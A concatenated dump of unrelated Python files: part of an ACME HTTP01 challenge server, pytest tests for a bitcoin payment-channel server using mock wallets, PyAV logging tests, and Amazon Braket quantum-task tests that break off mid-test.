class HTTP01DualNetworkedServers(BaseDualNetworkedServers):
    """HTTP01Server Wrapper. Tries everything for both. Failures for one don't
    affect the other."""

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # Fix the server class to HTTP01Server; everything else passes through.
        super().__init__(HTTP01Server, *args, **kwargs)
class HTTP01RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """HTTP01 challenge handler.

    Adheres to the stdlib's `socketserver.BaseRequestHandler` interface.

    :ivar set simple_http_resources: A set of `HTTP01Resource`
        objects. TODO: better name?
    """
    HTTP01Resource = collections.namedtuple(
        "HTTP01Resource", "chall response validation")

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # Custom keywords must be removed before the base class handles the
        # request (its __init__ processes the request immediately).
        self.simple_http_resources = kwargs.pop("simple_http_resources", set())
        self._timeout = kwargs.pop('timeout', 30)
        super().__init__(*args, **kwargs)
        self.server: HTTP01Server

    # In parent class BaseHTTPRequestHandler, 'timeout' is a class-level property but we
    # need to define its value during the initialization phase in HTTP01RequestHandler.
    # However MyPy does not appreciate that we dynamically shadow a class-level property
    # with an instance-level property (eg. self.timeout = ... in __init__()). So to make
    # everyone happy, we statically redefine 'timeout' as a method property, and set the
    # timeout value in a new internal instance-level property _timeout.
    @property
    def timeout(self) -> int:  # type: ignore[override]
        """
        The default timeout this server should apply to requests.
        :return: timeout to apply
        :rtype: int
        """
        return self._timeout

    def log_message(self, format: str, *args: Any) -> None:  # pylint: disable=redefined-builtin
        """Log arbitrary message."""
        logger.debug("%s - - %s", self.client_address[0], format % args)

    def handle(self) -> None:
        """Handle request."""
        self.log_message("Incoming request")
        BaseHTTPServer.BaseHTTPRequestHandler.handle(self)

    def do_GET(self) -> None:  # pylint: disable=invalid-name,missing-function-docstring
        # Route: index page, ACME challenge path, or 404.
        if self.path == "/":
            self.handle_index()
        elif self.path.startswith("/" + challenges.HTTP01.URI_ROOT_PATH):
            self.handle_simple_http_resource()
        else:
            self.handle_404()

    def handle_index(self) -> None:
        """Handle index page."""
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(self.server.server_version.encode())

    def handle_404(self) -> None:
        """Handle 404 Not Found errors."""
        self.send_response(http_client.NOT_FOUND, message="Not Found")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(b"404")

    def handle_simple_http_resource(self) -> None:
        """Handle HTTP01 provisioned resources."""
        for resource in self.simple_http_resources:
            if resource.chall.path == self.path:
                self.log_message("Serving HTTP01 with token %r",
                                 resource.chall.encode("token"))
                self.send_response(http_client.OK)
                self.end_headers()
                self.wfile.write(resource.validation.encode())
                return
        else:  # pylint: disable=useless-else-on-loop
            self.log_message("No resources to serve")
        self.log_message("%s does not correspond to any resource. ignoring",
                         self.path)

    @classmethod
    def partial_init(cls, simple_http_resources: Set[challenges.HTTP01],
                     timeout: int) -> 'functools.partial[HTTP01RequestHandler]':
        """Partially initialize this handler.

        This is useful because `socketserver.BaseServer` takes
        uninitialized handler and initializes it with the current
        request.
        """
        return functools.partial(
            cls, simple_http_resources=simple_http_resources,
            timeout=timeout)
class _BaseRequestHandlerWithLogging(socketserver.BaseRequestHandler):
    """BaseRequestHandler that logs each incoming request."""

    def log_message(self, format: str, *args: Any) -> None:  # pylint: disable=redefined-builtin
        """Log arbitrary message."""
        client_host = self.client_address[0]
        logger.debug("%s - - %s", client_host, format % args)

    def handle(self) -> None:
        """Handle request."""
        self.log_message("Incoming request")
        super().handle()
|
test_channels.py | """Tests for payment channel functionality."""
import time
import codecs
import pytest
import collections
import multiprocessing
import two1.bitcoin.utils as utils
from two1.bitcoin import Script, Hash
from two1.bitcoin import PrivateKey
from two1.bitcoin import Transaction, TransactionInput, TransactionOutput
from two1.channels.statemachine import PaymentChannelRedeemScript
from two1.bitserv.payment_server import PaymentServer, PaymentServerError
from two1.bitserv.payment_server import PaymentChannelNotFoundError
from two1.bitserv.payment_server import TransactionVerificationError
from two1.bitserv.payment_server import BadTransactionError
from two1.bitserv.models import DatabaseSQLite3, ChannelSQLite3
class MockTwo1Wallet:
    """Wallet to mock two1 wallet functions in a test environment."""

    def __init__(self):
        """Initialize the mock wallet with a private key."""
        self._private_key = PrivateKey.from_random()
        self.testnet = False

    def get_payout_public_key(self, account='default'):
        """Return the public key associated with the private key."""
        return self._private_key.public_key

    def get_private_for_public(self, public_key):
        """Get this private key for this public key."""
        # Compare by hex serialization; return None for any foreign key.
        if public_key.to_hex() == self._private_key.public_key.to_hex():
            return self._private_key
        else:
            return None

    def create_deposit_tx(self, hash160):
        """Return a mocked deposit transaction."""
        # Spend a fabricated outpoint (all-zero hash) into a 100000-value
        # P2SH output for the given script hash, signed with our key.
        utxo_script_sig = Script.build_p2pkh(self._private_key.public_key.hash160())
        inp = TransactionInput(
            outpoint=Hash('0' * 64), outpoint_index=0, script=utxo_script_sig, sequence_num=0xffffffff)
        out = TransactionOutput(value=100000, script=Script.build_p2sh(hash160))
        txn = Transaction(version=Transaction.DEFAULT_TRANSACTION_VERSION, inputs=[inp], outputs=[out], lock_time=0)
        txn.sign_input(
            input_index=0, hash_type=Transaction.SIG_HASH_ALL, private_key=self._private_key,
            sub_script=utxo_script_sig)
        return txn

    def create_payment_tx(self, deposit_tx, redeem_script, merchant_public_key,
                          customer_public_key, amount, fee):
        """Build and sign a channel payment transaction spending deposit_tx."""
        # Find P2SH output index in deposit_tx
        deposit_utxo_index = deposit_tx.output_index_for_address(redeem_script.hash160())
        # Look up deposit amount
        deposit_amount = deposit_tx.outputs[deposit_utxo_index].value - fee
        # Build unsigned payment transaction
        script_sig = Script()
        inp = TransactionInput(deposit_tx.hash, deposit_utxo_index, script_sig, 0xffffffff)
        # Split: `amount` to the merchant, remainder back to the customer.
        out1 = TransactionOutput(amount, Script.build_p2pkh(merchant_public_key.hash160()))
        out2 = TransactionOutput(deposit_amount - amount, Script.build_p2pkh(customer_public_key.hash160()))
        payment_tx = Transaction(1, [inp], [out1, out2], 0x0)
        # Sign payment transaction
        public_key = redeem_script.customer_public_key
        private_key = self.get_private_for_public(public_key)
        sig = payment_tx.get_signature_for_input(0, Transaction.SIG_HASH_ALL, private_key, redeem_script)[0]
        # Update input script sig
        script_sig = Script(
            [sig.to_der() + utils.pack_compact_int(Transaction.SIG_HASH_ALL), 'OP_1', bytes(redeem_script)])
        payment_tx.inputs[0].script = script_sig
        return payment_tx
class MockBlockchain:
    """No-op blockchain stub: broadcasts vanish, nothing is spent, all confirms."""

    def broadcast_tx(self, tx):
        """Pretend to broadcast ``tx``; does nothing."""
        return None

    def lookup_spend_txid(self, txid, output_index):
        """Report the queried output as unspent (always None)."""
        return None

    def check_confirmed(self, txid, num_confirmations=1):
        """Report every transaction as sufficiently confirmed."""
        return True
def mock_lookup_spent_txid(self, txid, output_index):
    """Monkeypatch replacement for MockBlockchain.lookup_spend_txid.

    Reports every output as spent by echoing the queried txid back.
    """
    return txid
###############################################################################
# Shared module-level fixtures for the channel tests.

# Hex-serialized client-side artifacts for one channel: deposit tx, payment tx,
# and the channel redeem script.
ClientVals = collections.namedtuple('ClientVals', ['deposit_tx', 'payment_tx', 'redeem_script'])
# Fixed amounts/durations reused throughout the tests.
TEST_DEP_AMOUNT = 100000
TEST_DUST_AMOUNT = 1
TEST_PMT_AMOUNT = 5000
TEST_FEE_AMOUNT = 10000
TEST_EXPIRY = 86400
# One mock wallet per side of the channel (customer and merchant).
cust_wallet = MockTwo1Wallet()
merch_wallet = MockTwo1Wallet()
# DER signature over the wrong message — used to exercise verification failures.
BAD_SIGNATURE = codecs.encode(cust_wallet._private_key.sign('fake').to_der(), 'hex_codec')
# Server under test, wired to the no-op blockchain stub.
channel_server = PaymentServer(merch_wallet, testnet=True)
channel_server._blockchain = MockBlockchain()
def _create_client_txs():
    """Build the client-side artifacts needed to open a channel.

    Returns a ClientVals tuple of hex-encoded deposit tx, payment tx,
    and redeem script.
    """
    expires = int(time.time() + TEST_EXPIRY)
    cust_pubkey = cust_wallet.get_payout_public_key()
    merch_pubkey = merch_wallet.get_payout_public_key()
    # Redeem script binds both parties' keys and the channel expiry.
    redeem_script = PaymentChannelRedeemScript(merch_pubkey, cust_pubkey, expires)
    deposit_tx = cust_wallet.create_deposit_tx(redeem_script.hash160())
    payment_tx = cust_wallet.create_payment_tx(
        deposit_tx, redeem_script, merch_pubkey, cust_pubkey,
        TEST_PMT_AMOUNT, TEST_FEE_AMOUNT)
    return ClientVals(deposit_tx.to_hex(), payment_tx.to_hex(), redeem_script.to_hex())
def _create_client_payment(client, num):
    """Build a hex payment tx worth ``num`` increments of TEST_PMT_AMOUNT."""
    cust_pubkey = cust_wallet.get_payout_public_key()
    merch_pubkey = merch_wallet.get_payout_public_key()
    deposit_tx = Transaction.from_hex(client.deposit_tx)
    redeem_script = PaymentChannelRedeemScript.from_bytes(
        codecs.decode(client.redeem_script, 'hex_codec'))
    payment = cust_wallet.create_payment_tx(
        deposit_tx, redeem_script, merch_pubkey, cust_pubkey,
        TEST_PMT_AMOUNT * num, TEST_FEE_AMOUNT)
    return payment.to_hex()
def test_identify():
    """Test ability to identify a payment server."""
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    pc_config = channel_server.identify()
    # Advertised key must be the merchant's compressed public key, hex-encoded.
    expected_key = codecs.encode(
        merch_wallet._private_key.public_key.compressed_bytes,
        'hex_codec').decode('utf-8')
    assert pc_config['public_key'] == expected_key
    assert pc_config['version'] == channel_server.PROTOCOL_VERSION
    assert pc_config['zeroconf'] is False
def test_channel_server_open():
    """Test ability to open a payment channel."""
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    client = _create_client_txs()
    # First open must succeed.
    channel_server.open(client.deposit_tx, client.redeem_script)
    # Re-opening with the same deposit/redeem pair must be rejected.
    with pytest.raises(PaymentServerError):
        channel_server.open(client.deposit_tx, client.redeem_script)
def test_receive_payment():
    """Test ability to receive a payment within a channel."""
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    client = _create_client_txs()
    # Paying into a nonexistent channel must fail.
    with pytest.raises(PaymentChannelNotFoundError):
        channel_server.receive_payment('fake', client.payment_tx)
    # Open the channel; the payment is then accepted once...
    deposit_txid = channel_server.open(client.deposit_tx, client.redeem_script)
    channel_server.receive_payment(deposit_txid, client.payment_tx)
    # ...and rejected when replayed.
    with pytest.raises(PaymentServerError):
        channel_server.receive_payment(deposit_txid, client.payment_tx)
def test_redeem_payment():
    """Test ability to redeem a payment made within a channel."""
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    client = _create_client_txs()
    # Redeeming an unknown payment must fail.
    with pytest.raises(PaymentChannelNotFoundError):
        channel_server.redeem('fake')
    # Open a channel, make a payment, and redeem it for the payment amount.
    deposit_txid = channel_server.open(client.deposit_tx, client.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid, client.payment_tx)
    assert channel_server.redeem(payment_txid) == TEST_PMT_AMOUNT
    # A second redeem of the same payment must be rejected.
    with pytest.raises(PaymentServerError):
        channel_server.redeem(payment_txid)
def test_status_close_channel():
    """Test ability to get a channel's status and close it."""
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    client = _create_client_txs()
    # Closing a nonexistent channel must fail.
    with pytest.raises(PaymentChannelNotFoundError):
        channel_server.close('fake', BAD_SIGNATURE)
    # Open the channel, then make and redeem a payment.
    deposit_txid = channel_server.open(client.deposit_tx, client.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid, client.payment_tx)
    channel_server.redeem(payment_txid)
    # An invalid signature must not close the channel.
    with pytest.raises(TransactionVerificationError):
        channel_server.close(deposit_txid, BAD_SIGNATURE)
    # A customer signature over the deposit txid closes it.
    good_signature = codecs.encode(
        cust_wallet._private_key.sign(deposit_txid).to_der(), 'hex_codec')
    assert channel_server.close(deposit_txid, good_signature)
def test_channel_sync(monkeypatch):
    """Test ability to sync the status of all channels.

    Exercises the sync path end to end: READY channels stay ready,
    CONFIRMING channels are promoted, near-expiry channels are closed with
    a fully signed payment, and channels whose deposit output is spent are
    closed.
    """
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    # Seed the database with activity in Channel A
    test_client_a = _create_client_txs()
    deposit_txid_a = channel_server.open(test_client_a.deposit_tx, test_client_a.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid_a, test_client_a.payment_tx)
    amount = channel_server.redeem(payment_txid)
    assert amount == TEST_PMT_AMOUNT
    # Seed the database with activity in Channel B; a fresh customer key makes
    # Channel B's redeem script distinct from Channel A's.
    cust_wallet._private_key = PrivateKey.from_random()
    test_client_b = _create_client_txs()
    deposit_txid_b = channel_server.open(test_client_b.deposit_tx, test_client_b.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid_b, test_client_b.payment_tx)
    amount = channel_server.redeem(payment_txid)
    payment_tx1 = _create_client_payment(test_client_b, 2)
    payment_tx2 = _create_client_payment(test_client_b, 3)
    payment_tx3 = _create_client_payment(test_client_b, 4)
    payment_txid1 = channel_server.receive_payment(deposit_txid_b, payment_tx1)
    payment_txid2 = channel_server.receive_payment(deposit_txid_b, payment_tx2)
    payment_txid3 = channel_server.receive_payment(deposit_txid_b, payment_tx3)
    # Redeem out of order to show ordering does not matter.
    amount1 = channel_server.redeem(payment_txid1)
    amount2 = channel_server.redeem(payment_txid3)
    amount3 = channel_server.redeem(payment_txid2)
    assert amount1 == TEST_PMT_AMOUNT
    assert amount2 == TEST_PMT_AMOUNT
    assert amount3 == TEST_PMT_AMOUNT
    # Both channels should be `ready` since our channel is zeroconf by default
    channels = channel_server._db.pc.lookup()
    assert channels, 'Channel lookup with no args should return a list of all channels.'
    for channel in channels:
        assert channel.state == ChannelSQLite3.READY, 'Channel should be READY.'
    # Change Channel A to `confirming` for testing purposes
    channel_server._db.pc.update_state(deposit_txid_a, ChannelSQLite3.CONFIRMING)
    test_state = channel_server._db.pc.lookup(deposit_txid_a).state
    assert test_state == ChannelSQLite3.CONFIRMING, 'Channel should be CONFIRMING'
    # Change Channel B's expiration to be very close to allowable expiration
    new_expiry = int(time.time() + 3600)
    update = 'UPDATE payment_channel SET expires_at=? WHERE deposit_txid=?'
    channel_server._db.pc.c.execute(update, (new_expiry, deposit_txid_b))
    channel_server._db.pc.c.connection.commit()
    test_expiry = channel_server._db.pc.lookup(deposit_txid_b).expires_at
    # NOTE: assertion message fixed ("should closing" -> "should be closing").
    assert test_expiry == new_expiry, 'Channel should be closing soon.'
    # Sync all of the server's payment channels
    channel_server.sync()
    # Test that Channel A is `ready` after a sync
    test_state = channel_server._db.pc.lookup(deposit_txid_a).state
    assert test_state == ChannelSQLite3.READY, 'Channel should be READY'
    # Test that Channel B is `closed` after a sync
    test_state = channel_server._db.pc.lookup(deposit_txid_b).state
    assert test_state == ChannelSQLite3.CLOSED, 'Channel should be CLOSED'
    # Test that Channel B payment is fully signed after a sync
    test_payment = channel_server._db.pc.lookup(deposit_txid_b).payment_tx
    goodsig_1 = Script.validate_template(test_payment.inputs[0].script, [bytes, bytes, 'OP_1', bytes])
    goodsig_true = Script.validate_template(test_payment.inputs[0].script, [bytes, bytes, 'OP_TRUE', bytes])
    assert goodsig_1 or goodsig_true, 'Payment should be in a fully signed format'
    # Test that Channel A remains `ready` after another sync
    channel_server.sync()
    test_state = channel_server._db.pc.lookup(deposit_txid_a).state
    assert test_state == ChannelSQLite3.READY, 'Channel should be READY'
    # Modify `lookup_spend_txid` to return a txid, as if the tx were spent
    monkeypatch.setattr(MockBlockchain, 'lookup_spend_txid', mock_lookup_spent_txid)
    # Test that Channel A is `closed` after a sync where it finds a spent txid
    channel_server.sync()
    test_state = channel_server._db.pc.lookup(deposit_txid_a).state
    assert test_state == ChannelSQLite3.CLOSED, 'Channel should be CLOSED'
def test_channel_low_balance_message():
    """Test that the channel server returns a useful error when the balance is low.

    Opens a channel, nearly drains it, then verifies that an over-budget
    payment is rejected with a balance-related message and that the channel
    can still be closed cleanly afterwards.
    """
    channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
    test_client = _create_client_txs()
    # Open the channel and make a payment
    deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
    channel_server.redeem(payment_txid)
    # Create a payment that almost completely drains the channel
    payment_tx2 = _create_client_payment(test_client, 17)
    payment_txid2 = channel_server.receive_payment(deposit_txid, payment_tx2)
    channel_server.redeem(payment_txid2)
    # Make a payment that spends more than the remaining channel balance
    payment_tx3 = _create_client_payment(test_client, 18)
    with pytest.raises(BadTransactionError) as exc:
        channel_server.receive_payment(deposit_txid, payment_tx3)
    # Check the exception's own message via exc.value: str() of the
    # ExceptionInfo wrapper is a repr in modern pytest, not the message.
    assert 'Payment channel balance' in str(exc.value)
    # Test that channel close succeeds
    good_signature = codecs.encode(cust_wallet._private_key.sign(deposit_txid).to_der(), 'hex_codec')
    closed = channel_server.close(deposit_txid, good_signature)
    assert closed
def test_channel_redeem_race_condition():
    """Test the ability to lock redeems across multiple processes.

    Two redeems of the same payment run concurrently; the slow one must
    lose the race and exit with an error rather than double-redeem.
    """
    # Clear test database (a file path so it can be shared across processes)
    multiprocess_db = '/tmp/bitserv_test.sqlite3'
    with open(multiprocess_db, 'w') as f:
        f.write('')
    # Initialize test vectors
    channel_server._db = DatabaseSQLite3(multiprocess_db)
    test_client = _create_client_txs()
    deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
    payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
    # Cache channel result for later
    channel = channel_server._db.pc.lookup(deposit_txid)
    # This is a function that takes a long time
    def delayed_pc_lookup(deposit_txid):
        time.sleep(0.5)
        return channel
    # This is the normal function
    def normal_pc_lookup(deposit_txid):
        return channel
    # This function is called between the first lookup and the final record update
    # We make sure this function takes extra long the first time it's called
    # in order to expose the race condition
    channel_server._db.pc.lookup = delayed_pc_lookup
    # Start the first redeem in its own process and allow time to begin
    p = multiprocessing.Process(target=channel_server.redeem, args=(payment_txid,))
    p.start()
    time.sleep(0.1)
    # After starting the first redeem, reset the function to take a normal amount of time
    channel_server._db.pc.lookup = normal_pc_lookup
    # To test the race, this redeem is called while the other redeem is still in-process
    # Because this call makes it to the final database update first, it should be successful
    channel_server.redeem(payment_txid)
    # The multiprocess redeem is intentionally made slow, and will finish after the redeem above
    # Because of this, the multiprocess redeem should throw an exception and exit with an error
    p.join()
    assert p.exitcode == 1
|
test_logging.py | from __future__ import division
import errno
import logging
import threading
import av.error
import av.logging
from .common import TestCase
def do_log(message):
    """Emit an INFO-level record through PyAV's logging under the 'test' name."""
    av.logging.log(av.logging.INFO, 'test', message)
class TestLogging(TestCase):
    """Tests for PyAV's logging bridge and its capture helpers."""

    def test_adapt_level(self):
        """av log levels map onto the corresponding stdlib logging levels."""
        self.assertEqual(
            av.logging.adapt_level(av.logging.ERROR),
            logging.ERROR
        )
        self.assertEqual(
            av.logging.adapt_level(av.logging.WARNING),
            logging.WARNING
        )
        # A level between WARNING and ERROR adapts to WARNING.
        self.assertEqual(
            av.logging.adapt_level((av.logging.WARNING + av.logging.ERROR) // 2),
            logging.WARNING
        )

    def test_threaded_captures(self):
        """A local capture records the capturing thread's own messages."""
        with av.logging.Capture(local=True) as logs:
            do_log('main')
            thread = threading.Thread(target=do_log, args=('thread', ))
            thread.start()
            thread.join()
        # Only the main-thread record is asserted; presumably local=True
        # excludes other threads' records — confirm against av.logging docs.
        self.assertIn((av.logging.INFO, 'test', 'main'), logs)

    def test_global_captures(self):
        """A global capture records messages from all threads."""
        with av.logging.Capture(local=False) as logs:
            do_log('main')
            thread = threading.Thread(target=do_log, args=('thread', ))
            thread.start()
            thread.join()
        self.assertIn((av.logging.INFO, 'test', 'main'), logs)
        self.assertIn((av.logging.INFO, 'test', 'thread'), logs)

    def test_repeats(self):
        """Consecutive duplicate messages collapse into a '(repeated ...)' record."""
        with av.logging.Capture() as logs:
            do_log('foo')
            do_log('foo')
            do_log('bar')
            do_log('bar')
            do_log('bar')
            do_log('baz')
        # Keep only records emitted under our 'test' name.
        logs = [log for log in logs if log[1] == 'test']
        self.assertEqual(logs, [
            (av.logging.INFO, 'test', 'foo'),
            (av.logging.INFO, 'test', 'foo'),
            (av.logging.INFO, 'test', 'bar'),
            (av.logging.INFO, 'test', 'bar (repeated 2 more times)'),
            (av.logging.INFO, 'test', 'baz'),
        ])

    def test_error(self):
        """err_check raises an OSError carrying the last matching log record."""
        log = (av.logging.ERROR, 'test', 'This is a test.')
        av.logging.log(*log)
        try:
            av.error.err_check(-errno.EPERM)
        except OSError as e:
            self.assertEqual(e.log, log)
        else:
            self.fail()
|
test_aws_quantum_task.py | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import asyncio
import json
import threading
import time
from unittest.mock import MagicMock, Mock, patch
import pytest
from common_test_utils import MockS3
from jsonschema import validate
from braket.annealing.problem import Problem, ProblemType
from braket.aws import AwsQuantumTask
from braket.aws.aws_quantum_task import _create_annealing_device_params
from braket.aws.aws_session import AwsSession
from braket.circuits import Circuit
from braket.device_schema import GateModelParameters
from braket.device_schema.dwave import (
Dwave2000QDeviceParameters,
DwaveAdvantageDeviceParameters,
DwaveDeviceParameters,
)
from braket.device_schema.ionq import IonqDeviceParameters
from braket.device_schema.rigetti import RigettiDeviceParameters
from braket.device_schema.simulators import GateModelSimulatorDeviceParameters
from braket.tasks import AnnealingQuantumTaskResult, GateModelQuantumTaskResult
# Default S3 destination folder used across the task tests.
S3_TARGET = AwsSession.S3DestinationFolder("foo", "bar")
# Shorthand device ARNs for each device flavor under test.
IONQ_ARN = "device/qpu/ionq"
RIGETTI_ARN = "device/qpu/rigetti"
SIMULATOR_ARN = "device/quantum-simulator"
# (device arn, expected device-parameters schema class) pairs for parametrization.
DEVICE_PARAMETERS = [
    (IONQ_ARN, IonqDeviceParameters),
    (RIGETTI_ARN, RigettiDeviceParameters),
    (SIMULATOR_ARN, GateModelSimulatorDeviceParameters),
]
@pytest.fixture
def aws_session():
    """Mock AwsSession whose quantum-task metadata reports RUNNING."""
    mock = Mock()
    _mock_metadata(mock, "RUNNING")
    return mock


@pytest.fixture
def quantum_task(aws_session):
    """Generic task handle with a short poll timeout for fast tests."""
    return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)


@pytest.fixture
def circuit_task(aws_session):
    """Task handle used by the gate-model (circuit) result tests."""
    return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)


@pytest.fixture
def annealing_task(aws_session):
    """Task handle used by the annealing result tests."""
    return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)


@pytest.fixture
def arn():
    """Arbitrary task ARN string."""
    return "foo:bar:arn"


@pytest.fixture
def circuit():
    """Two-qubit H + CNOT circuit."""
    return Circuit().h(0).cnot(0, 1)


@pytest.fixture
def problem():
    """Small ISING annealing problem."""
    return Problem(ProblemType.ISING, linear={1: 3.14}, quadratic={(1, 2): 10.08})
def test_equality(arn, aws_session):
    """Tasks compare equal by id; distinct ids and non-task values do not."""
    task_a = AwsQuantumTask(arn, aws_session)
    task_b = AwsQuantumTask(arn, aws_session)
    different_task = AwsQuantumTask("different:arn", aws_session)
    assert task_a == task_b
    assert task_a is not task_b
    assert task_a != different_task
    # A plain string (the id itself) is never equal to a task object.
    assert task_a != task_a.id
def test_str(quantum_task):
    """__str__ embeds the task ARN in a fixed format."""
    assert str(quantum_task) == f"AwsQuantumTask('id/taskArn':'{quantum_task.id}')"
def test_hash(quantum_task):
    """The task hashes like its id string."""
    expected = hash(quantum_task.id)
    assert hash(quantum_task) == expected
def test_id_getter(arn, aws_session):
    """The id property reflects the ARN the task was constructed with."""
    task = AwsQuantumTask(arn, aws_session)
    assert task.id == arn
@pytest.mark.xfail(raises=AttributeError)
def test_no_id_setter(quantum_task):
    """The id property is read-only; assignment raises AttributeError."""
    quantum_task.id = 123
def test_metadata(quantum_task):
    """metadata() refreshes from the service unless a cached value is requested."""
    running_meta = {"status": "RUNNING"}
    quantum_task._aws_session.get_quantum_task.return_value = running_meta
    assert quantum_task.metadata() == running_meta
    quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
    completed_meta = {"status": "COMPLETED"}
    quantum_task._aws_session.get_quantum_task.return_value = completed_meta
    # The cached read must return the previously fetched metadata.
    assert quantum_task.metadata(use_cached_value=True) == running_meta
def test_metadata_call_if_none(quantum_task):
    """use_cached_value=True still hits the service when nothing is cached yet."""
    meta = {"status": "RUNNING"}
    quantum_task._aws_session.get_quantum_task.return_value = meta
    assert quantum_task.metadata(use_cached_value=True) == meta
    quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
def test_state(quantum_task):
    """state() tracks the service status; cached reads return the last fetch."""
    _mock_metadata(quantum_task._aws_session, "RUNNING")
    assert quantum_task.state() == "RUNNING"
    quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
    # A cached read ignores the newer COMPLETED status.
    _mock_metadata(quantum_task._aws_session, "COMPLETED")
    assert quantum_task.state(use_cached_value=True) == "RUNNING"
    # Fresh reads observe each subsequent terminal state.
    _mock_metadata(quantum_task._aws_session, "FAILED")
    assert quantum_task.state() == "FAILED"
    _mock_metadata(quantum_task._aws_session, "CANCELLED")
    assert quantum_task.state() == "CANCELLED"
def test_cancel(quantum_task):
    """cancel() cancels the pending future and notifies the service."""
    pending = quantum_task.async_result()
    assert not pending.done()
    quantum_task.cancel()
    # A cancelled task yields no result and a cancelled future.
    assert quantum_task.result() is None
    assert pending.cancelled()
    quantum_task._aws_session.cancel_quantum_task.assert_called_with(quantum_task.id)
def test_cancel_without_fetching_result(quantum_task):
    """cancel() works even when async_result() was never requested first."""
    quantum_task.cancel()
    assert quantum_task.result() is None
    assert quantum_task._future.cancelled()
    quantum_task._aws_session.cancel_quantum_task.assert_called_with(quantum_task.id)
def asyncio_get_event_loop_side_effect(*args, **kwargs):
    """Generator side effect: fail once, then hand back one shared mock loop.

    Yielding an exception instance makes MagicMock raise it on the first
    call; every later call returns the same MagicMock loop.
    """
    yield ValueError("unit-test-exception")
    shared_loop = MagicMock()
    while True:
        yield shared_loop
@patch("braket.aws.aws_quantum_task.asyncio")
def test_initialize_asyncio_event_loop_if_required(mock_asyncio, quantum_task):
    """A new event loop is created and installed when get_event_loop first fails."""
    # First get_event_loop call raises; subsequent calls return a mock loop.
    mock_asyncio.get_event_loop.side_effect = asyncio_get_event_loop_side_effect()
    mock_asyncio.set_event_loop.return_value = MagicMock()
    mock_asyncio.new_event_loop.return_value = MagicMock()
    quantum_task._get_future()
    # get_event_loop is tried twice: once failing, once after the new loop is set.
    assert mock_asyncio.get_event_loop.call_count == 2
    assert mock_asyncio.set_event_loop.call_count == 1
    assert mock_asyncio.new_event_loop.call_count == 1
def test_result_circuit(circuit_task):
    """A COMPLETED gate-model task parses its S3 result payload."""
    _mock_metadata(circuit_task._aws_session, "COMPLETED")
    _mock_s3(circuit_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
    assert circuit_task.result() == GateModelQuantumTaskResult.from_string(
        MockS3.MOCK_S3_RESULT_GATE_MODEL)
    # The payload must come from the bucket/key advertised in task metadata.
    bucket = circuit_task.metadata()["outputS3Bucket"]
    directory = circuit_task.metadata()["outputS3Directory"]
    circuit_task._aws_session.retrieve_s3_object_body.assert_called_with(
        bucket, f"{directory}/results.json")
def test_result_annealing(annealing_task):
    """A COMPLETED annealing task parses its S3 result payload."""
    _mock_metadata(annealing_task._aws_session, "COMPLETED")
    _mock_s3(annealing_task._aws_session, MockS3.MOCK_S3_RESULT_ANNEALING)
    assert annealing_task.result() == AnnealingQuantumTaskResult.from_string(
        MockS3.MOCK_S3_RESULT_ANNEALING)
    # The payload must come from the bucket/key advertised in task metadata.
    bucket = annealing_task.metadata()["outputS3Bucket"]
    directory = annealing_task.metadata()["outputS3Directory"]
    annealing_task._aws_session.retrieve_s3_object_body.assert_called_with(
        bucket, f"{directory}/results.json")
@pytest.mark.xfail(raises=TypeError)
def test_result_invalid_type(circuit_task):
    """A result payload with an unrecognized schema raises TypeError."""
    _mock_metadata(circuit_task._aws_session, "COMPLETED")
    # Task metadata JSON is not a valid result document.
    _mock_s3(circuit_task._aws_session, json.dumps(MockS3.MOCK_TASK_METADATA))
    circuit_task.result()
def test_result_circuit_cached(circuit_task):
    """A cached result is returned without re-reading S3."""
    _mock_metadata(circuit_task._aws_session, "COMPLETED")
    cached = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
    circuit_task._result = cached
    assert circuit_task.result() == cached
    assert not circuit_task._aws_session.retrieve_s3_object_body.called
def test_no_result(circuit_task):
    """A FAILED task yields no result and never touches S3."""
    _mock_metadata(circuit_task._aws_session, "FAILED")
    circuit_task._result = None
    assert circuit_task.result() is None
    assert not circuit_task._aws_session.retrieve_s3_object_body.called
@pytest.mark.parametrize(
    "result_string",
    [MockS3.MOCK_S3_RESULT_GATE_MODEL, MockS3.MOCK_S3_RESULT_GATE_MODEL_WITH_RESULT_TYPES],
)
def test_result_cached_future(circuit_task, result_string):
    """Once fetched, the result is served from cache even if S3 changes."""
    _mock_metadata(circuit_task._aws_session, "COMPLETED")
    _mock_s3(circuit_task._aws_session, result_string)
    circuit_task.result()
    # Blank out the S3 payload; the cached result must still come back.
